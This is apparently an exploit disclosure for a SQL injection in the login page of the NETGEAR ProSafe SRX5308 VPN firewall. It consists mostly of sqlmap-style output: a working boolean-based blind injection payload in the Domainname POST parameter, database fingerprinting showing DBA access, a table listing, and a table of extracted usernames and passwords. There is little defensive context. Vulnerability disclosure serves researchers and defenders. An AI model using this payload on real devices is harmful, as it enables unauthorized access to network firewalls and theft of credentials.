NETGEAR ProSafe WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability

2021-12-22 14:34:44

NETGEAR ProSafe WAN SSL VPN Firewall SQL Injection Vulnerability

NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308

NETGEAR ProSafe™ - NETGEAR Configuration Manager Login

https://192.168.1.1/scgi-bin/platform.cgi

---
Parameter: USERDBDomains.Domainname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
    Vector: AND [INFERENCE]
---
  
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True

available databases [1]:
[ ] SQLite_masterdb

Database: SQLite_masterdb
[4 tables]
+----------+
| system   |
| logging  |
| services |
| zones    |
+----------+

passwd and shadow encryption cracked
+---------------------+
| username | password |
+----------+----------+
| showid   | password |
+----------+----------+
| guest    | password |
+----------+----------+
